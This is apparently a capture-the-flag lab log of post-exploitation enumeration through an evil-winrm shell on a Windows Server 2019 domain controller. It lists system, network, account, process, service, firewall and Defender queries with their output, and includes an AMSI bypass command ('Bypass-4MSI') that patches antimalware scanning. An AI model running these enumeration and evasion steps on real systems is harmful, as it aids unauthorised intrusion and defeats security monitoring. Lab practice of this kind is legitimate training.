System/Kernel
*evil-winrm* ps c:\Users\matthew\Documents> systeminfo ; Get-ComputerInfo
program 'systeminfo.exe' failed to run: Access is denied At line:1 char:1
+ systeminfo ; Get-ComputerInfo
+ ~~~~~~~~~~.
at line:1 char:1
+ systeminfo ; Get-ComputerInfo
+ ~~~~~~~~~~
+ categoryinfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ fullyqualifiederrorid : NativeCommandFailed
windowsbuildlabex : 17763.1.amd64fre.rs5_release.180914-1434
windowscurrentversion : 6.3
windowseditionid : ServerStandard
windowsinstallationtype : Server
windowsinstalldatefromregistry : 4/10/2020 5:48:06 PM
windowsproductid : 00429-00521-62775-AA477
windowsproductname : Windows Server 2019 Standard
windowsregisteredorganization :
windowsregisteredowner : Windows User
windowssystemroot : C:\Windows
windowsversion : 1809
osserverlevel : FullServer
keyboardlayout :
timezone : (UTC-08:00) Pacific Time (US & Canada)
logonserver :
powerplatformrole : Desktop
deviceguardsmartstatus : Off
*evil-winrm* ps c:\Users\matthew\Documents> cmd /c ver
Microsoft Windows [Version 10.0.17763.4010]Windows Server 2019 Standard
10.0.17763.4010
FullServer
Desktop
Networks
*Evil-WinRM* PS C:\Users\matthew\Documents> ipconfig /all ; arp -a ; print route
Windows IP Configuration
Host Name . . . . . . . . . . . . : DC
Primary Dns Suffix . . . . . . . : cerberus.local
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : cerberus.local
htb
Ethernet adapter vEthernet (Switch1):
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Hyper-V Virtual Ethernet Adapter
Physical Address. . . . . . . . . : 00-15-5D-5F-E8-00
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::e225:edaa:5112:dfc3%6(Preferred)
IPv4 Address. . . . . . . . . . . : 172.16.22.1(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.240
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 452990301
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2B-5F-1B-88-00-50-56-B4-33-03
DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
NetBIOS over Tcpip. . . . . . . . : Enabled
Ethernet adapter Ethernet0 3:
Connection-specific DNS Suffix . : htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter #2
Physical Address. . . . . . . . . : 00-50-56-B9-A9-A0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::138(Preferred)
Lease Obtained. . . . . . . . . . : Tuesday, January 16, 2024 10:59:40 PM
Lease Expires . . . . . . . . . . : Wednesday, January 17, 2024 10:29:40 AM
IPv6 Address. . . . . . . . . . . : dead:beef::c349:4d0f:4db0:880(Preferred)
Link-local IPv6 Address . . . . . : fe80::2df8:1fb:a85b:f52d%5(Preferred)
IPv4 Address. . . . . . . . . . . : 10.10.11.205(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%5
10.10.10.2
DHCPv6 IAID . . . . . . . . . . . : 486559830
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2B-5F-1B-88-00-50-56-B4-33-03
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Connection-specific DNS Suffix Search List :
htb
Interface: 10.10.11.205 --- 0x5
Internet Address Physical Address Type
10.10.10.2 00-50-56-b9-6c-92 dynamic
10.10.11.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
Interface: 172.16.22.1 --- 0x6
Internet Address Physical Address Type
172.16.22.2 00-15-5d-5f-e8-01 dynamic
172.16.22.15 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
Unable to initialize device PRNHyper-V Virtual Ethernet Adapter 172.16.22.1
*Evil-WinRM* PS C:\Users\matthew\Documents> netstat -ano | Select-String LIST
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 696
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 948
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 696
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 696
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 948
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 696
TCP 0.0.0.0:808 0.0.0.0:0 LISTENING 6892
TCP 0.0.0.0:1500 0.0.0.0:0 LISTENING 6892
TCP 0.0.0.0:1501 0.0.0.0:0 LISTENING 6892
TCP 0.0.0.0:2179 0.0.0.0:0 LISTENING 3444
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 696
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 696
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 5524
TCP 0.0.0.0:9251 0.0.0.0:0 LISTENING 5524
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2544
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 532
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1232
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1604
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 696
TCP 0.0.0.0:49689 0.0.0.0:0 LISTENING 696
TCP 0.0.0.0:49690 0.0.0.0:0 LISTENING 696
TCP 0.0.0.0:49898 0.0.0.0:0 LISTENING 696
TCP 0.0.0.0:49915 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49920 0.0.0.0:0 LISTENING 2096
TCP 0.0.0.0:49934 0.0.0.0:0 LISTENING 3156
TCP 0.0.0.0:49961 0.0.0.0:0 LISTENING 3112
TCP 10.10.11.205:53 0.0.0.0:0 LISTENING 3156
TCP 10.10.11.205:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 3156
TCP 127.0.0.1:32000 0.0.0.0:0 LISTENING 2548
TCP 127.0.0.1:33308 0.0.0.0:0 LISTENING 2640
TCP 127.0.0.1:49924 0.0.0.0:0 LISTENING 5524
TCP 172.16.22.1:53 0.0.0.0:0 LISTENING 3156
TCP 172.16.22.1:139 0.0.0.0:0 LISTENING 4
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:88 [::]:0 LISTENING 696
TCP [::]:135 [::]:0 LISTENING 948
TCP [::]:389 [::]:0 LISTENING 696
TCP [::]:443 [::]:0 LISTENING 4
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:464 [::]:0 LISTENING 696
TCP [::]:593 [::]:0 LISTENING 948
TCP [::]:636 [::]:0 LISTENING 696
TCP [::]:808 [::]:0 LISTENING 6892
TCP [::]:1500 [::]:0 LISTENING 6892
TCP [::]:1501 [::]:0 LISTENING 6892
TCP [::]:2179 [::]:0 LISTENING 3444
TCP [::]:3268 [::]:0 LISTENING 696
TCP [::]:3269 [::]:0 LISTENING 696
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:9389 [::]:0 LISTENING 2544
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 532
TCP [::]:49665 [::]:0 LISTENING 1232
TCP [::]:49666 [::]:0 LISTENING 1604
TCP [::]:49667 [::]:0 LISTENING 696
TCP [::]:49689 [::]:0 LISTENING 696
TCP [::]:49690 [::]:0 LISTENING 696
TCP [::]:49898 [::]:0 LISTENING 696
TCP [::]:49915 [::]:0 LISTENING 668
TCP [::]:49920 [::]:0 LISTENING 2096
TCP [::]:49934 [::]:0 LISTENING 3156
TCP [::]:49961 [::]:0 LISTENING 3112
TCP [::1]:53 [::]:0 LISTENING 3156
TCP [::1]:33308 [::]:0 LISTENING 2640
TCP [dead:beef::138]:53 [::]:0 LISTENING 3156
TCP [dead:beef::c349:4d0f:4db0:880]:53 [::]:0 LISTENING 3156
TCP [fe80::2df8:1fb:a85b:f52d%5]:53 [::]:0 LISTENING 3156
TCP [fe80::e225:edaa:5112:dfc3%6]:53 [::]:0 LISTENING 31560.0.0.0:808
0.0.0.0:1500
0.0.0.0:1501
0.0.0.0:2179
0.0.0.0:8888
0.0.0.0:9251
Users & Groups
*evil-winrm* ps c:\Users\matthew\Documents> net users ; ls C:\Users
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest krbtgt
matthew
The command completed with one or more errors.
directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/30/2023 2:44 AM adfs_svc$
d----- 1/30/2023 4:14 AM adfs_svc$.CERBERUS
d----- 11/29/2022 4:24 AM Administrator
d----- 1/22/2023 11:22 AM matthew
d-r--- 4/10/2020 10:49 AM Publicadfs_svc$
adfs_svc$.CERBERUS
*evil-winrm* ps c:\Users\matthew\Documents> net localgroup ; net group /DOMAIN
Aliases for \\DC
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.
Group Accounts for \\
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.Processes
*Evil-WinRM* PS C:\Users\matthew\Documents> cmd /c tasklist /svc
cmd.exe : ERROR: Access denied
+ CategoryInfo : NotSpecified: (ERROR: Access denied:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\matthew\Documents> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
399 34 13064 22316 2096 0 certsrv
81 5 2280 3916 1952 0 cmd
160 9 6668 12876 3640 0 conhost
139 8 6452 10996 5808 0 conhost
154 9 6672 12800 0.06 6780 0 conhost
604 23 2532 5088 424 0 csrss
177 14 1848 4512 548 1 csrss
400 33 16624 23556 3112 0 dfsrs
159 8 1940 6268 3324 0 dfssvc
265 14 3932 13860 4332 0 dllhost
10403 7411 129904 128300 3156 0 dns
532 22 23528 41468 448 1 dwm
54 6 1624 4400 4032 1 fontdrvhost
54 7 1652 4436 4360 0 fontdrvhost
196 10 1652 1628 1856 0 GoogleCrashHandler
174 9 1736 1332 1884 0 GoogleCrashHandler64
231 14 2260 3868 1616 0 GoogleUpdate
0 0 56 8 0 0 Idle
206 16 6520 15660 3272 0 inetinfo
139 12 1952 5776 3244 0 ismserv
1947 69 318868 282160 5524 0 java
473 27 11036 48228 5880 1 LogonUI
47 6 1196 3360 688 0 LsaIso
2104 193 89624 91476 696 0 lsass
431 30 37172 47308 2544 0 Microsoft.ActiveDirectory.WebServices
1027 297 431220 382664 6892 0 Microsoft.IdentityServer.ServiceHost
235 13 3420 10628 4780 0 msdtc
376 21 6864 27296 1056 0 OpenWith
329 9 2720 6768 1004 0 postgres
393 14 3328 19092 2640 0 postgres
327 9 2676 6740 2868 0 postgres
443 11 6600 16856 4204 0 postgres
329 9 2968 11284 4384 0 postgres
329 9 3288 7628 5084 0 postgres
329 9 3632 8024 5088 0 postgres
328 9 3036 7136 5372 0 postgres
329 9 3080 10708 5480 0 postgres
328 9 2996 9144 5484 0 postgres
0 13 316 14320 92 0 Registry
0 0 168 13316 48 0 Secure System
641 15 6236 14052 668 0 services
53 3 484 1208 340 0 smss
727 71 279952 193952 5160 0 sqlservr
135 10 1644 8100 3304 0 sqlwriter
222 12 1764 7660 8 0 svchost
130 16 3444 7668 812 0 svchost
153 9 1748 6724 824 0 svchost
90 5 928 4000 888 0 svchost
779 16 5776 15412 908 0 svchost
775 19 4204 11164 948 0 svchost
191 11 1864 8348 964 0 svchost
238 10 1732 6940 992 0 svchost
145 7 1324 5920 1028 0 svchost
262 14 3828 9476 1076 0 svchost
222 9 2136 7560 1116 0 svchost
119 8 1328 6132 1136 0 svchost
372 13 10460 14968 1232 0 svchost
412 32 11484 20596 1272 0 svchost
376 19 5232 13500 1352 0 svchost
256 16 3252 13200 1400 0 svchost
240 12 2840 12300 1416 0 svchost
439 9 2804 9060 1428 0 svchost
122 7 1248 5656 1440 0 svchost
179 10 1776 8408 1476 0 svchost
324 10 2552 8644 1532 0 svchost
163 11 1664 8016 1540 0 svchost
367 18 5004 14496 1604 0 svchost
318 13 2108 9140 1636 0 svchost
185 11 1916 8228 1732 0 svchost
148 9 1584 6672 1792 0 svchost
108 7 1136 5220 1804 0 svchost
266 13 3788 11324 1816 0 svchost
221 12 2208 9320 1924 0 svchost
170 9 1932 7168 1960 0 svchost
189 15 6088 10324 2008 0 svchost
233 12 2672 12572 2156 0 svchost
465 17 14960 24300 2220 0 svchost
472 19 3360 12528 2272 0 svchost
243 25 3624 12820 2328 0 svchost
303 20 9284 15728 2340 0 svchost
206 11 2236 8596 2456 0 svchost
316 16 16304 19000 2616 0 svchost
143 9 2980 10640 2700 0 svchost
171 12 3852 11148 2760 0 svchost
165 10 1988 7740 2824 0 svchost
130 7 1288 5888 2928 0 svchost
179 11 2452 13284 2948 0 svchost
423 22 17132 31188 3124 0 svchost
269 13 2488 8076 3204 0 svchost
326 18 5644 22760 3212 0 svchost
139 8 1528 6432 3312 0 svchost
139 9 1588 6728 3340 0 svchost
234 14 4672 12244 3424 0 svchost
296 17 3800 14672 3456 0 svchost
170 10 2144 13168 3532 0 svchost
239 13 2256 8436 3688 0 svchost
409 26 3492 13392 4148 0 svchost
171 9 3044 7844 6968 0 svchost
1962 0 192 152 4 0 System
214 16 2440 10776 4024 0 vds
177 11 3248 12028 3476 0 VGAuthService
151 8 1688 7332 3404 0 vm3dservice
144 10 1784 7772 3924 1 vm3dservice
140 9 1664 7604 6928 1 vm3dservice
178 10 2460 9960 4508 0 vmcompute
629 25 43856 30616 3444 0 vmms
410 23 11412 23712 3416 0 vmtoolsd
403 19 9480 20952 3028 0 vmwp
176 11 1396 6484 532 0 wininit
246 12 2544 18044 628 1 winlogon
395 20 24924 35348 2036 0 WmiPrvSE
324 16 18068 27152 4952 0 WmiPrvSE
286 16 3492 12096 2548 0 wrapper
3114 36 103816 130704 1.78 5276 0 wsmprovhostcertsrv
dns
GoogleCrashHandler
GoogleCrashHandler64
GoogleUpdate
java
OpenWith
postgres
sqlservr
sqlwriter
vmcompute
vmms
vmwp
Services
*evil-winrm* ps c:\Users\matthew\Documents> Bypass-4MSI
info: Patching 4MSI, please be patient...
[+] Success!
*evil-winrm* ps c:\Users\matthew\Documents> services
Path Privileges Service
---- ---------- -------
c:\Windows\ADFS\Microsoft.IdentityServer.ServiceHost.exe False adfssrv
"c:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin\wrapper.exe" -s "C:\Program Files (x86)\ManageEngine\ADSelfService Plus\conf\wrapper.conf" False ADSelfServicePlus
c:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe False ADWS
"c:\Program Files\Google\Chrome\Application\110.0.5481.178\elevation_service.exe" False GoogleChromeElevationService
"c:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc False gupdate
"c:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc False gupdatem
c:\Windows\WID\Binn\sqlservr.exe -SMSWIN8.SQLWID -sMICROSOFT##WID False MSSQL$MICROSOFT##WID
c:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
c:\Windows\SysWow64\perfhost.exe False PerfHost
"c:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense
c:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"c:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" False VGAuthService
"c:\Program Files\VMware\VMware Tools\vmtoolsd.exe" False VMTools
"c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2301.6-0\NisSrv.exe" True WdNisSvc
c:\Windows\WID\Binn\sqlwriter.exe -w False WIDWriter
"c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2301.6-0\MsMpEng.exe" True WinDefend
"c:\Program Files\Windows Media Player\wmpnetwk.exe" False WMPNetworkSvc Tasks
*Evil-WinRM* PS C:\Users\matthew\Documents> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
Cannot connect to CIM server. Access denied
At line:1 char:1
+ Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft ...
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (MSFT_ScheduledTask:String) [Get-ScheduledTask], CimJobException
+ FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-ScheduledTask
*Evil-WinRM* PS C:\Users\matthew\Documents> schtasks /QUERY /FO TABLE | findstr /v /i "\Microsoft" | findstr /v /i "access level" | findstr /v /i "system32"
Program 'schtasks.exe' failed to run: Access is deniedAt line:1 char:1
+ schtasks /QUERY /FO TABLE | findstr /v /i "\Microsoft" | findstr /v / ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ schtasks /QUERY /FO TABLE | findstr /v /i "\Microsoft" | findstr /v / ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailedFirewall & AV
*evil-winrm* ps c:\Users\matthew\Documents> netsh firewall show config
domain profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Disable
service configuration for domain profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No File and Printer Sharing
allowed programs configuration for domain profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
port configuration for domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
icmp configuration for domain profile:
Mode Type Description
-------------------------------------------------------------------
Enable 8 Allow inbound echo request
standard profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Disable
service configuration for standard profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No File and Printer Sharing
Enable Yes Network Discovery
allowed programs configuration for standard profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
port configuration for standard profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
icmp configuration for standard profile:
Mode Type Description
-------------------------------------------------------------------
Enable 8 Allow inbound echo request
log configuration:
-------------------------------------------------------------------
file location = c:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .FW is heavily enabled
*evil-winrm* ps c:\Users\matthew\Documents> Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property ExclusionPath
Cannot connect to CIM server. Access denied
at line:1 char:1
+ Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property Exc ...
+ ~~~~~~~~~~~~~~~~~~~~
+ categoryinfo : ResourceUnavailable: (MSFT_MpComputerStatus:String) [Get-MpComputerStatus], CimJobException
+ fullyqualifiederrorid : CimJob_BrokenCimSession,Get-MpComputerStatus
Cannot connect to CIM server. Access denied
at line:1 char:24
+ Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property Exc ...
+ ~~~~~~~~~~~~~~~~
+ categoryinfo : ResourceUnavailable: (MSFT_MpPreference:String) [Get-MpPreference], CimJobException
+ fullyqualifiederrorid : CimJob_BrokenCimSession,Get-MpPreferenceSession Architecture
*Evil-WinRM* PS C:\Users\matthew\Documents> [Environment]::Is64BitProcess
TrueInstalled .NET Frameworks
*evil-winrm* ps c:\Users\matthew\Documents> cmd /c dir /A:D C:\Windows\Microsoft.NET\Framework ; cmd /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" ; cmd /c reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
Volume in drive C has no label.
Volume Serial Number is D9B1-79BF
directory of c:\Windows\Microsoft.NET\Framework
09/14/2018 11:19 PM <DIR> .
09/14/2018 11:19 PM <DIR> ..
09/14/2018 11:19 PM <DIR> v1.0.3705
09/14/2018 11:19 PM <DIR> v1.1.4322
09/14/2018 11:19 PM <DIR> v2.0.50727
01/16/2024 11:10 PM <DIR> v4.0.30319
0 File(s) 0 bytes
6 Dir(s) 6,371,500,032 bytes free
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\CDF\v4.0
HttpNamespaceReservationInstalled REG_DWORD 0x1
NetTcpPortSharingInstalled REG_DWORD 0x1
NonHttpActivationInstalled REG_DWORD 0x1
smsvchostpath reg_sz c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
WMIInstalled REG_DWORD 0x1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
installpath reg_sz c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client\1033
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
installpath reg_sz c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full\1033
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4.0
(Default) REG_SZ deprecated
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4.0\Client
Install REG_DWORD 0x1
Version REG_SZ 4.0.0.0.NET 4.7.03190